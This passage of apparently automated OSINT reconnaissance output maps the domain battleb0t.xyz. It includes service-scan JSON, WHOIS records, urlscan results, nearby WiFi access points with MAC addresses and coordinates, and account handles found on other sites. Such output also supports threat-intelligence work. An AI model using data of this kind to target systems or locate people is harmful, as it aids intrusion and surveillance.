"2023-04-25T12:49:47.725442827Z", "names": ["971118.cloudwaysapps.com"]}}, "services": [{"transport_protocol": "TCP", "_encoding": {"banner": "DISPLAY_UTF8", "banner_hex": "DISPLAY_HEX"}, "labels": ["remote-access"], "truncated": false, "service_name": "SSH", "_decoded": "ssh", "banner_hashes": ["sha256:989054422845f7fb4a0f578fbb62a589973974ff9b7310e0eee11f9d1819efdb"], "source_ip": "167.94.145.60", "extended_service_name": "SSH", "observed_at": "2023-05-11T11:58:34.839347829Z", "banner_hex": "5353482d322e302d4f70656e5353485f372e3970312044656269616e2d31302b64656231307532", "perspective_id": "PERSPECTIVE_ORANGE", "transport_fingerprint": {"raw": "65160,64,true,MSTNW,1460,false,false", "os": "CentOS", "id": 262}, "banner": 
"SSH-2.0-OpenSSH_7.9p1 Debian-10+deb10u2", "port": 22, "ssh": {"server_host_key": {"fingerprint_sha256": "0172e87daef36c52da4bd5592787fb64e976f73f4f61384a12164ac56f2ce5a1", "rsa_public_key": {"_encoding": {"modulus": "DISPLAY_BASE64", "exponent": "DISPLAY_BASE64"}, "length": 2048, "modulus": "uPxDpRdIrA/iz2ExEgRAxKmXST2zSxUUASzEIsL6O2PTrSNc6umFNFt/dHdxbK0YoU5gp4vR8iK16J/is3qdC1O0ZbGjQDlTCf7Ot9E/wR2JFzowSc1s9mpCkXPL2tjFtwBDcuHkmqou6ryP5VE5ak4jNCg57zigC0YIUbaIQBZ2jxMULPFDZH04Sm7BCi6dspyzcLPQj8OZRf2GyAISVhP0sEJYaziXVgNTRAQlqfYIDf9Nzlq1NseWj/r6MQ8+fir5bRq/WXlDIO3L0kx/XXBOQazwt1JhrESalbK3qpruuXFPUsHNFo5uT3KgeXHGYW3PgarxkIAvPDmJRHKYqQ==", "exponent": "AAEAAQ=="}}, "algorithm_selection": {"server_to_client_alg_group": {"mac": "hmac-sha2-256", "cipher": "aes128-ctr", "compression": "none"}, "host_key_algorithm": "ssh-rsa", "client_to_server_alg_group": {"mac": "hmac-sha2-256", "cipher": "aes128-ctr", "compression": "none"}, "kex_algorithm": "curve25519-sha256@libssh.org"}, "kex_init_message": {"host_key_algorithms": ["rsa-sha2-512", "rsa-sha2-256", "ssh-rsa"], "client_to_server_compression": ["none", "zlib@openssh.com"], "server_to_client_ciphers": ["chacha20-poly1305@openssh.com", "aes128-ctr", "aes192-ctr", "aes256-ctr", "aes128-gcm@openssh.com", "aes256-gcm@openssh.com"], "client_to_server_macs": ["umac-64-etm@openssh.com", "umac-128-etm@openssh.com", "hmac-sha2-256-etm@openssh.com", "hmac-sha2-512-etm@openssh.com", "hmac-sha1-etm@openssh.com", "umac-64@openssh.com", "umac-128@openssh.com", "hmac-sha2-256", "hmac-sha2-512", "hmac-sha1"], "first_kex_follows": false, "kex_algorithms": ["curve25519-sha256", "curve25519-sha256@libssh.org", "ecdh-sha2-nistp256", "ecdh-sha2-nistp384", "ecdh-sha2-nistp521", "diffie-hellman-group-exchange-sha256", "diffie-hellman-group16-sha512", "diffie-hellman-group18-sha512", "diffie-hellman-group14-sha256", "diffie-hellman-group14-sha1"], "server_to_client_compression": ["none", "zlib@openssh.com"], "client_to_server_ciphers": 
["chacha20-poly1305@openssh.com", "aes128-ctr", "aes192-ctr", "aes256-ctr", "aes128-gcm@openssh.com", "aes256-gcm@openssh.com"], "server_to_client_macs": ["umac-64-etm@openssh.com", "umac-128-etm@openssh.com", "hmac-sha2-256-etm@openssh.com", "hmac-sha2-512-etm@openssh.com", "hmac-sha1-etm@openssh.com", "umac-64@openssh.com", "umac-128@openssh.com", "hmac-sha2-256", "hmac-sha2-512", "hmac-sha1"]}, "endpoint_id": {"comment": "Debian-10+deb10u2", "_encoding": {"raw": "DISPLAY_UTF8"}, "protocol_version": "2.0", "software_version": "OpenSSH_7.9p1", "raw": "SSH-2.0-OpenSSH_7.9p1 Debian-10+deb10u2"}, "hassh_fingerprint": "b12d2871a1189eff20364cf5333619ee"}, "software": [{"source": "OSI_APPLICATION_LAYER", "product": "openssh", "other": {"comment": "Debian-10+deb10u2"}}, {"source": "OSI_TRANSPORT_LAYER", "product": "linux", "part": "o", "uniform_resource_identifier": "cpe:2.3:o:*:linux:*:*:*:*:*:*:*:*"}, {"product": "OpenSSH", "vendor": "OpenBSD", "version": "7.9", "update": "p1", "source": "OSI_APPLICATION_LAYER", "part": "a", "uniform_resource_identifier": "cpe:2.3:a:openbsd:openssh:7.9:p1:*:*:*:*:*:*", "other": {"family": "OpenSSH"}}, {"product": "Linux", "vendor": "Debian", "version": "10.2", "source": "OSI_APPLICATION_LAYER", "other": {"family": "Linux"}, "uniform_resource_identifier": "cpe:2.3:o:debian:debian_linux:10.2:*:*:*:*:*:*:*", "part": "o"}]}, {"transport_protocol": "TCP", "_encoding": {"banner": "DISPLAY_UTF8", "banner_hex": "DISPLAY_HEX"}, "http": {"request": {"headers": {"_encoding": {"User_Agent": "DISPLAY_UTF8", "Accept": "DISPLAY_UTF8"}, "User_Agent": ["Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"], "Accept": ["*/*"]}, "method": "GET", "uri": "http://64.226.81.43/"}, "response": {"body": "<!DOCTYPE html>\n<html>\n <iframe src=\"https://cloudways-static-content.s3.us-east-1.amazonaws.com/error_page/maintenance-domain-mapping.html\" frameborder=\"0\" 
style=\"overflow:hidden;overflow-x:hidden;overflow-y:hidden;height:100%;width:100%;position:absolute;top:0px;left:0px;right:0px;bottom:0px\" height=\"100%\" width=\"100%\"></iframe>\n</html> ", "_encoding": {"body": "DISPLAY_UTF8", "body_hash": "DISPLAY_UTF8"}, "protocol": "HTTP/1.1", "headers": {"_encoding": {"Vary": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Etag": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8"}, "Vary": ["Accept-Encoding"], "Server": ["nginx"], "Connection": ["keep-alive"], "Etag": ["W/\"64217dc5-156\""], "Content_Type": ["text/html"], "Date": ["<REDACTED>"]}, "body_hashes": ["sha256:d5e3078cb88ba53faa1d104c27054d2a8ff92665b4c02144f55489bf5c254016", "sha1:5d4eb7befed38d050a2b1adaa91de040a5beb9bf"], "status_code": 403, "body_hash": "sha1:5d4eb7befed38d050a2b1adaa91de040a5beb9bf", "body_size": 342, "status_reason": "Forbidden"}, "supports_http2": false}, "truncated": false, "service_name": "HTTP", "_decoded": "http", "banner_hashes": ["sha256:888a2d848f3d16b40c32b4ff30abaadaacb398a98d5a44f4a0237b14ce63d529"], "source_ip": "167.248.133.36", "extended_service_name": "HTTP", "observed_at": "2023-05-11T05:48:53.194396164Z", "banner_hex": "485454502f312e312034303320466f7262696464656e0d0a5365727665723a206e67696e780d0a446174653a20203c52454441435445443e0d0a436f6e74656e742d547970653a20746578742f68746d6c0d0a5472616e736665722d456e636f64696e673a206368756e6b65640d0a436f6e6e656374696f6e3a206b6565702d616c6976650d0a566172793a204163636570742d456e636f64696e670d0a455461673a20572f2236343231376463352d313536220d0a436f6e74656e742d456e636f64696e673a20677a69700d0a", "perspective_id": "PERSPECTIVE_NTT", "banner": "HTTP/1.1 403 Forbidden\r\nServer: nginx\r\nDate: <REDACTED>\r\nContent-Type: text/html\r\nTransfer-Encoding: chunked\r\nConnection: keep-alive\r\nVary: Accept-Encoding\r\nETag: W/\"64217dc5-156\"\r\nContent-Encoding: gzip\r\n", "port": 80, "software": [{"product": "nginx", "vendor": "nginx", "source": 
"OSI_APPLICATION_LAYER", "part": "a", "uniform_resource_identifier": "cpe:2.3:a:f5:nginx:*:*:*:*:*:*:*:*", "other": {"family": "nginx"}}]}, {"tls": {"version_selected": "TLSv1_3", "certificates": {"_encoding": {"chain_fps_sha_256": "DISPLAY_HEX", "leaf_fp_sha_256": "DISPLAY_HEX"}, "chain_fps_sha_256": ["7fa4ff68ec04a99d7528d5085f94907f4d1dd1c5381bacdc832ed5c960214676", "68b9c761219a5b1f0131784474665db61bbdb109e00f05ca9f74244ee5f5f52b", "d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef4"], "chain": [{"issuer_dn": "C=US, ST=New Jersey, L=Jersey City, O=The USERTRUST Network, CN=USERTrust RSA Certification Authority", "subject_dn": "C=GB, ST=Greater Manchester, L=Salford, O=Sectigo Limited, CN=Sectigo RSA Domain Validation Secure Server CA", "fingerprint": "7fa4ff68ec04a99d7528d5085f94907f4d1dd1c5381bacdc832ed5c960214676"}, {"issuer_dn": "C=GB, ST=Greater Manchester, L=Salford, O=Comodo CA Limited, CN=AAA Certificate Services", "subject_dn": "C=US, ST=New Jersey, L=Jersey City, O=The USERTRUST Network, CN=USERTrust RSA Certification Authority", "fingerprint": "68b9c761219a5b1f0131784474665db61bbdb109e00f05ca9f74244ee5f5f52b"}, {"issuer_dn": "C=GB, ST=Greater Manchester, L=Salford, O=Comodo CA Limited, CN=AAA Certificate Services", "subject_dn": "C=GB, ST=Greater Manchester, L=Salford, O=Comodo CA Limited, CN=AAA Certificate Services", "fingerprint": "d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef4"}], "leaf_data": {"pubkey_algorithm": "RSA", "public_key": {"key_algorithm": "RSA", "rsa": {"_encoding": {"modulus": "DISPLAY_BASE64", "exponent": "DISPLAY_BASE64"}, "length": 256, "modulus": "0TpnPayT/qE4F6J4qzOiK7JhnrAo9bFLNo2svrHA/v0LaIOAybJrnc5AyyYwgS6PTnc5WMsgwlVeIH5TInjmeEsEinXaSlGOrsV7Gm/ZW+7PMzYrK4KMP7g5Pv95Q5JU7FTQvxHAzRGxkvPDzcyogoNJIk1KXgVLPxdUyd+B1UFVrTMrqAkIf0M1HRzdWlOHv+OEsQ2QjcnXP0mIdDF6sbDns9klIt09P59g0zL++OZSIkvbIRKyvkKcmp+73HQRF0pjn2SY2RJKMExBzgIlPDKzcHLqDMPRl2zP8TcIdzRjF/X4rRYa64yxqmMYIDs4WPnhkpo7c5uTK7f4TFIU1Q==", 
"exponent": "AAEAAQ=="}, "fingerprint": "e577b60ecc733cd981273f877b2ab03d93986490630d699801165ebbec0a48cf"}, "subject_dn": "CN=*.cloudwaysapps.com", "pubkey_bit_size": 2048, "fingerprint": "46c14572bed6bb1c8797e7a0292d295e561d717b22535af514608f0d2fe40802", "issuer_dn": "C=GB, ST=Greater Manchester, L=Salford, O=Sectigo Limited, CN=Sectigo RSA Domain Validation Secure Server CA", "names": ["*.cloudwaysapps.com", "cloudwaysapps.com"], "tbs_fingerprint": "f9537ad843dfc5f6c9ec168dd4c17c3b |
| 2023-05-12 03:01:44 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.235): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 02:54:17 | Open TCP Port Banner | No | Censys | 0 | 0 | 4 | 0 | None | HTTP/1.1 400 Bad Request
Server: cloudflare
Date: <REDACTED>
Content-Type: text/html
Content-Length: 253
Connection: close
CF-RAY: -
| 2606:4700:3037::6815:470e |
| 2023-05-12 02:54:34 | Physical Location | No | Censys | 0 | 0 | 3 | 0 | None | San Francisco, California, 94107, United States, North America | 104.21.71.14 |
| 2023-05-12 03:08:47 | Affiliate - IP Address | No | DNS Look-aside | 1 | 0 | 3 | 0 | None | 104.196.30.224 | 104.196.30.220 |
| 2023-05-12 03:27:00 | Web Server | No | Web Server Identifier | 0 | 1 | 3 | 0 | None | GitHub.com | {"content-length": "690", "via": "1.1 varnish", "vary": "Accept-Encoding", "etag": "W/\"642b434c-4fb\"", "x-cache-hits": "1", "cache-control": "max-age=600", "x-served-by": "cache-lga21959-LGA", "x-cache": "HIT", "x-github-request-id": "F620:0A4B:1087FED:17E0EF4:645DA7F4", "accept-ranges": "bytes", "expires": "Fri, 12 May 2023 02:54:04 GMT", "last-modified": "Mon, 03 Apr 2023 21:21:16 GMT", "x-fastly-request-id": "88b13ec8ddf02c1379830d22f861ddb1826456ec", "date": "Fri, 12 May 2023 02:54:15 GMT", "access-control-allow-origin": "*", "x-proxy-cache": "MISS", "content-encoding": "gzip", "age": "562", "x-timer": "S1683860056.740489,VS0,VE2", "server": "GitHub.com", "connection": "keep-alive", "content-type": "text/html; charset=utf-8"} |
| 2023-05-12 03:18:58 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | linksys (Net ID: 00:06:25:9D:4C:90) | 33.6170672,-111.90564645297056 |
| 2023-05-12 03:19:09 | Account on External Site | No | Account Finder | 0 | 0 | 6 | 0 | None | Blogspot (Category: blog)
http://login.blogspot.com | login |
| 2023-05-12 02:44:18 | Co-Hosted Site - Domain Name | No | SSL Certificate Analyzer | 0 | 0 | 2 | 0 | None | github.com | 185.199.111.153 |
| 2023-05-12 03:18:54 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | InnoPoint (Net ID: 00:02:2D:55:AD:1C) | 50.1188, 8.6843 |
| 2023-05-12 03:24:29 | Affiliate - Company Name | No | Company Name Extractor | 0 | 0 | 4 | 0 | None | Cloudflare, Inc. | Domain Name: CLOUDFLARE.COM
Registry Domain ID: 1542998887_DOMAIN_COM-VRSN
Registrar WHOIS Server: whois.cloudflare.com
Registrar URL: http://www.cloudflare.com
Updated Date: 2017-05-24T17:44:01Z
Creation Date: 2009-02-17T22:07:54Z
Registry Expiry Date: 2024-02-17T22:07:54Z
Registrar: CloudFlare, Inc.
Registrar IANA ID: 1910
Registrar Abuse Contact Email:
Registrar Abuse Contact Phone:
Domain Status: clientDeleteProhibited https://icann.org/epp#clientDeleteProhibited
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Domain Status: clientUpdateProhibited https://icann.org/epp#clientUpdateProhibited
Domain Status: serverDeleteProhibited https://icann.org/epp#serverDeleteProhibited
Domain Status: serverTransferProhibited https://icann.org/epp#serverTransferProhibited
Domain Status: serverUpdateProhibited https://icann.org/epp#serverUpdateProhibited
Name Server: NS3.CLOUDFLARE.COM
Name Server: NS4.CLOUDFLARE.COM
Name Server: NS5.CLOUDFLARE.COM
Name Server: NS6.CLOUDFLARE.COM
Name Server: NS7.CLOUDFLARE.COM
DNSSEC: signedDelegation
DNSSEC DS Data: 2371 13 2 32996839A6D808AFE3EB4A795A0E6A7A39A76FC52FF228B22B76F6D63826F2B9
URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
>>> Last update of whois database: 2023-05-12T02:59:31Z <<<
For more information on Whois status codes, please visit https://icann.org/epp
NOTICE: The expiration date displayed in this record is the date the
registrar's sponsorship of the domain name registration in the registry is
currently set to expire. This date does not necessarily reflect the expiration
date of the domain name registrant's agreement with the sponsoring
registrar. Users may consult the sponsoring registrar's Whois database to
view the registrar's reported date of expiration for this registration.
TERMS OF USE: You are not authorized to access or query our Whois
database through the use of electronic processes that are high-volume and
automated except as reasonably necessary to register domain names or
modify existing registrations; the Data in VeriSign Global Registry
Services' ("VeriSign") Whois database is provided by VeriSign for
information purposes only, and to assist persons in obtaining information
about or related to a domain name registration record. VeriSign does not
guarantee its accuracy. By submitting a Whois query, you agree to abide
by the following terms of use: You agree that you may use this Data only
for lawful purposes and that under no circumstances will you use this Data
to: (1) allow, enable, or otherwise support the transmission of mass
unsolicited, commercial advertising or solicitations via e-mail, telephone,
or facsimile; or (2) enable high volume, automated, electronic processes
that apply to VeriSign (or its computer systems). The compilation,
repackaging, dissemination or other use of this Data is expressly
prohibited without the prior written consent of VeriSign. You agree not to
use electronic processes that are automated and high-volume to access or
query the Whois database except as reasonably necessary to register
domain names or modify existing registrations. VeriSign reserves the right
to restrict your access to the Whois database in its sole discretion to ensure
operational stability. VeriSign may restrict or terminate your access to the
Whois database for failure to abide by these terms of use. VeriSign
reserves the right to modify these terms at any time.
The Registry database contains ONLY .COM, .NET, .EDU domains and
Registrars.
Domain Name: CLOUDFLARE.COM
Registry Domain ID: 1542998887_DOMAIN_COM-VRSN
Registrar WHOIS Server: whois.cloudflare.com
Registrar URL: https://www.cloudflare.com
Updated Date: 2021-09-27T15:18:45Z
Creation Date: 2009-02-17T22:07:54Z
Registrar Registration Expiration Date: 2024-02-17T22:07:54Z
Registrar: Cloudflare, Inc.
Registrar IANA ID: 1910
Domain Status: clientdeleteprohibited https://icann.org/epp#clientdeleteprohibited
Domain Status: clienttransferprohibited https://icann.org/epp#clienttransferprohibited
Domain Status: serverdeleteprohibited https://icann.org/epp#serverdeleteprohibited
Domain Status: servertransferprohibited https://icann.org/epp#servertransferprohibited
Domain Status: serverupdateprohibited https://icann.org/epp#serverupdateprohibited
Domain Status: clientupdateprohibited https://icann.org/epp#clientupdateprohibited
Registry Registrant ID:
Registrant Name: DATA REDACTED
Registrant Organization: DATA REDACTED
Registrant Street: DATA REDACTED
Registrant City: DATA REDACTED
Registrant State/Province: CA
Registrant Postal Code: DATA REDACTED
Registrant Country: US
Registrant Phone: DATA REDACTED
Registrant Phone Ext: DATA REDACTED
Registrant Fax: DATA REDACTED
Registrant Fax Ext: DATA REDACTED
Registrant Email: https://domaincontact.cloudflareregistrar.com/cloudflare.com
Registry Admin ID:
Admin Name: DATA REDACTED
Admin Organization: DATA REDACTED
Admin Street: DATA REDACTED
Admin City: DATA REDACTED
Admin State/Province: DATA REDACTED
Admin Postal Code: DATA REDACTED
Admin Country: DATA REDACTED
Admin Phone: DATA REDACTED
Admin Phone Ext: DATA REDACTED
Admin Fax: DATA REDACTED
Admin Fax Ext: DATA REDACTED
Admin Email: https://domaincontact.cloudflareregistrar.com/cloudflare.com
Registry Tech ID:
Tech Name: DATA REDACTED
Tech Organization: DATA REDACTED
Tech Street: DATA REDACTED
Tech City: DATA REDACTED
Tech State/Province: DATA REDACTED
Tech Postal Code: DATA REDACTED
Tech Country: DATA REDACTED
Tech Phone: DATA REDACTED
Tech Phone Ext: DATA REDACTED
Tech Fax: DATA REDACTED
Tech Fax Ext: DATA REDACTED
Tech Email: https://domaincontact.cloudflareregistrar.com/cloudflare.com
Registry Billing ID:
Billing Name: DATA REDACTED
Billing Organization: DATA REDACTED
Billing Street: DATA REDACTED
Billing City: DATA REDACTED
Billing State/Province: DATA REDACTED
Billing Postal Code: DATA REDACTED
Billing Country: DATA REDACTED
Billing Phone: DATA REDACTED
Billing Phone Ext: DATA REDACTED
Billing Fax: DATA REDACTED
Billing Fax Ext: DATA REDACTED
Billing Email: https://domaincontact.cloudflareregistrar.com/cloudflare.com
Name Server: ns3.cloudflare.com
Name Server: ns4.cloudflare.com
Name Server: ns5.cloudflare.com
Name Server: ns6.cloudflare.com
Name Server: ns7.cloudflare.com
DNSSEC: signedDelegation
Registrar Abuse Contact Email: registrar-abuse@cloudflare.com
Registrar Abuse Contact Phone: +1.4153197517
URL of the ICANN WHOIS Data Problem Reporting System: http://wdprs.internic.net/
>>> Last update of WHOIS database: 2023-05-12T02:59:47Z <<<
For more information on Whois status codes, please visit https://icann.org/epp
Cloudflare provides more than 13 million domains with the tools to give their global users a faster, more secure, and more reliable internet experience.
NOTICE:
Data in the Cloudflare Registrar WHOIS database is provided to you by Cloudflare
under the terms and conditions at https://www.cloudflare.com/domain-registration-agreement/
By submitting this query, you agree to abide by these terms.
Register your domain name at https://www.cloudflare.com/registrar/
|
| 2023-05-12 03:18:25 | Account on External Site | No | Account Finder | 0 | 0 | 5 | 0 | None | MySpace (Category: social)
https://myspace.com/Altpapier | Altpapier |
| 2023-05-12 02:56:57 | Internet Name | No | DNS Resolver | 0 | 0 | 2 | 0 | None | kekw.battleb0t.xyz | [{u'sort': [1679937961810, u'be713cda-cf3f-49bd-91b6-e8517dc017bf'], u'task': {u'domain': u'kekw.battleb0t.xyz', u'uuid': u'be713cda-cf3f-49bd-91b6-e8517dc017bf', u'tags': [u'falconsandbox'], u'url': u'http://kekw.battleb0t.xyz/jar', u'visibility': u'public', u'time': u'2023-03-27T17:26:01.810Z', u'apexDomain': u'battleb0t.xyz', u'method': u'api'}, u'stats': {u'uniqIPs': 1, u'uniqCountries': 0, u'encodedDataLength': 0, u'requests': 1, u'dataLength': 0}, u'screenshot': u'https://urlscan.io/screenshots/be713cda-cf3f-49bd-91b6-e8517dc017bf.png', u'_score': None, u'result': u'https://urlscan.io/api/v1/result/be713cda-cf3f-49bd-91b6-e8517dc017bf/', u'_id': u'be713cda-cf3f-49bd-91b6-e8517dc017bf', u'page': {u'url': u'http://kekw.battleb0t.xyz/jar', u'domain': u'kekw.battleb0t.xyz', u'apexDomain': u'battleb0t.xyz'}}, {u'sort': [1679768811151, u'4b027c18-4e16-4bfc-8793-6295946cceb7'], u'task': {u'domain': u'kekw.battleb0t.xyz', u'uuid': u'4b027c18-4e16-4bfc-8793-6295946cceb7', u'tags': [u'https://phish.report', u'@phish_report'], u'url': u'https://kekw.battleb0t.xyz/jar', u'visibility': u'public', u'time': u'2023-03-25T18:26:51.151Z', u'apexDomain': u'battleb0t.xyz', u'method': u'api'}, u'stats': {u'uniqIPs': 1, u'uniqCountries': 1, u'encodedDataLength': 84, u'requests': 1, u'dataLength': 11}, u'screenshot': u'https://urlscan.io/screenshots/4b027c18-4e16-4bfc-8793-6295946cceb7.png', u'_score': None, u'result': u'https://urlscan.io/api/v1/result/4b027c18-4e16-4bfc-8793-6295946cceb7/', u'_id': u'4b027c18-4e16-4bfc-8793-6295946cceb7', u'page': {u'mimeType': u'text/plain', u'status': u'502', u'domain': u'kekw.battleb0t.xyz', u'url': u'https://kekw.battleb0t.xyz/jar', u'country': u'DE', u'tlsValidFrom': u'2023-03-23T21:24:09.000Z', u'asnname': u'DIGITALOCEAN-ASN, US', u'tlsIssuer': u'Easypanel', u'tlsValidDays': 3650, u'ip': u'64.226.81.43', u'apexDomain': u'battleb0t.xyz', 
u'tlsAgeDays': 1, u'asn': u'AS14061'}}, {u'sort': [1678573216685, u'ac5ae0a3-e538-4bd1-ac20-6d6f8a5fe2ea'], u'task': {u'domain': u'kekw.battleb0t.xyz', u'uuid': u'ac5ae0a3-e538-4bd1-ac20-6d6f8a5fe2ea', u'tags': [u'https://phish.report', u'@phish_report'], u'url': u'http://kekw.battleb0t.xyz/', u'visibility': u'public', u'time': u'2023-03-11T22:20:16.685Z', u'apexDomain': u'battleb0t.xyz', u'method': u'api'}, u'stats': {u'uniqIPs': 1, u'uniqCountries': 1, u'encodedDataLength': 300, u'requests': 1, u'dataLength': 207}, u'screenshot': u'https://urlscan.io/screenshots/ac5ae0a3-e538-4bd1-ac20-6d6f8a5fe2ea.png', u'_score': None, u'result': u'https://urlscan.io/api/v1/result/ac5ae0a3-e538-4bd1-ac20-6d6f8a5fe2ea/', u'_id': u'ac5ae0a3-e538-4bd1-ac20-6d6f8a5fe2ea', u'page': {u'mimeType': u'text/html', u'status': u'404', u'domain': u'kekw.battleb0t.xyz', u'title': u'404 Not Found', u'url': u'https://kekw.battleb0t.xyz/', u'ip': u'46.101.229.70', u'tlsValidFrom': u'2023-01-27T17:58:43.000Z', u'asnname': u'DIGITALOCEAN-ASN, US', u'server': u'Werkzeug/2.2.2 Python/3.10.9', u'tlsIssuer': u'R3', u'tlsValidDays': 89, u'country': u'DE', u'redirected': u'https-only', u'apexDomain': u'battleb0t.xyz', u'tlsAgeDays': 43, u'asn': u'AS14061'}}, {u'sort': [1678573191537, u'd8289b22-dbac-48d2-856a-e99fe632406b'], u'task': {u'domain': u'kekw.battleb0t.xyz', u'uuid': u'd8289b22-dbac-48d2-856a-e99fe632406b', u'tags': [u'https://phish.report', u'@phish_report'], u'url': u'http://kekw.battleb0t.xyz/', u'visibility': u'public', u'time': u'2023-03-11T22:19:51.537Z', u'apexDomain': u'battleb0t.xyz', u'method': u'api'}, u'stats': {u'uniqIPs': 1, u'uniqCountries': 1, u'encodedDataLength': 300, u'requests': 1, u'dataLength': 207}, u'screenshot': u'https://urlscan.io/screenshots/d8289b22-dbac-48d2-856a-e99fe632406b.png', u'_score': None, u'result': u'https://urlscan.io/api/v1/result/d8289b22-dbac-48d2-856a-e99fe632406b/', u'_id': u'd8289b22-dbac-48d2-856a-e99fe632406b', u'page': {u'mimeType': 
u'text/html', u'status': u'404', u'domain': u'kekw.battleb0t.xyz', u'title': u'404 Not Found', u'url': u'https://kekw.battleb0t.xyz/', u'ip': u'46.101.229.70', u'tlsValidFrom': u'2023-01-27T17:58:43.000Z', u'asnname': u'DIGITALOCEAN-ASN, US', u'server': u'Werkzeug/2.2.2 Python/3.10.9', u'tlsIssuer': u'R3', u'tlsValidDays': 89, u'country': u'DE', u'redirected': u'https-only', u'apexDomain': u'battleb0t.xyz', u'tlsAgeDays': 43, u'asn': u'AS14061'}}] |
| 2023-05-12 02:53:25 | IPv6 Address | No | Mnemonic PassiveDNS | 0 | 0 | 2 | 0 | None | 2606:4700:3037::6815:470e | www.battleb0t.xyz |
| 2023-05-12 03:32:52 | Non-Standard HTTP Header | No | Strange Header Identifier | 0 | 0 | 4 | 0 | None | cross-origin-embedder-policy: require-corp | {"content-encoding": "gzip", "nel": "{\"success_fraction\":0,\"report_to\":\"cf-nel\",\"max_age\":604800}", "referrer-policy": "same-origin", "permissions-policy": "accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()", "cross-origin-resource-policy": "same-origin", "transfer-encoding": "chunked", "alt-svc": "h3=\":443\"; ma=86400, h3-29=\":443\"; ma=86400", "expires": "Thu, 01 Jan 1970 00:00:01 GMT", "vary": "Accept-Encoding", "server": "cloudflare", "connection": "close", "report-to": "{\"endpoints\":[{\"url\":\"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=fJBUelNZ98yfCYgTc7WNhjysoMluqrTDHq0SVIO%2F0YIAsdqyzhnqcXYutPnufmVGlk%2F%2BT8t3g7wQdFh43VhAxqE%2FmCarJp88icmjJuhwuBRUeOwsppojYEabsQ%3D%3D\"}],\"group\":\"cf-nel\",\"max_age\":604800}", "cf-mitigated": "challenge", "cache-control": "private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0", "date": "Fri, 12 May 2023 03:24:21 GMT", "x-frame-options": "SAMEORIGIN", "cross-origin-embedder-policy": "require-corp", "content-type": "text/html; charset=UTF-8", "cf-ray": "7c5f8c59d97743e3-EWR", "cross-origin-opener-policy": "same-origin"} |
| 2023-05-12 02:57:33 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 3 | 0 | None | (raw JSON record omitted) | 34.148.97.127 |
| 2023-05-12 02:54:34 | Raw Data from RIRs | No | Censys | 0 | 0 | 3 | 0 | None | (raw JSON record omitted) | 104.21.71.14 |
| 2023-05-12 03:08:45 | Affiliate - IP Address | No | DNS Look-aside | 1 | 0 | 3 | 0 | None | 104.196.30.213 | 104.196.30.220 |
| 2023-05-12 03:32:18 | Malicious Affiliate | Yes | abuse.ch | 0 | 1 | 4 | 0 | None | abuse.ch URLhaus (Domain) [cdn-185-199-111-154.github.com]
https://urlhaus.abuse.ch/downloads/csv_recent/ | cdn-185-199-111-154.github.com |
| 2023-05-12 03:18:57 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | 101 (Net ID: 00:01:03:7B:E0:44) | 37.780462,-122.390564 |
| 2023-05-12 02:46:16 | Affiliate Description - Category | No | DuckDuckGo | 0 | 0 | 3 | 0 | None | Project hosting websites | battleb0t.github.io |
| 2023-05-12 03:18:51 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | suddenlink.net-B882 (Net ID: 9C:34:26:46:B8:80) | 37.751, -97.822 |
| 2023-05-12 03:01:45 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.245): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 03:18:59 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | NGMH (Net ID: 00:09:5B:B3:C8:70) | 33.617190550339146,-111.90827887019054 |
| 2023-05-12 03:19:01 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | USR9108 (Net ID: 00:14:C1:1A:3F:1C) | 40.2024, 29.0398 |
| 2023-05-12 03:18:54 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | Freigut (Net ID: 00:01:21:21:C1:60) | 50.1188, 8.6843 |
| 2023-05-12 02:56:56 | Internet Name | No | DNS Resolver | 0 | 0 | 4 | 0 | None | kekw.battleb0t.xyz | (raw JSON record omitted) |
| 2023-05-12 03:23:02 | Account on External Site | No | Account Finder | 0 | 0 | 2 | 0 | None | Audiojungle (Category: music)
https://audiojungle.net/user/ayhu | ayhu |
| 2023-05-12 02:46:50 | Co-Hosted Site - Domain Name | No | SSL Certificate Analyzer | 0 | 0 | 3 | 0 | None | netlify.app | 34.148.97.127 |
| 2023-05-12 02:55:18 | BGP AS Membership | No | Censys | 0 | 0 | 3 | 0 | None | 14061 | 46.101.229.70 |
| 2023-05-12 03:18:53 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | no_ssid (Net ID: 00:00:0C:07:AC:29) | 41.8781, -87.6298 |
| 2023-05-12 02:51:20 | SSL Certificate - Raw Data | No | Certificate Transparency | 1 | 0 | 1 | 0 | None | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
03:57:f8:5f:6c:a4:d7:b1:d8:61:78:13:80:db:41:a4:54:3d
Signature Algorithm: sha256WithRSAEncryption
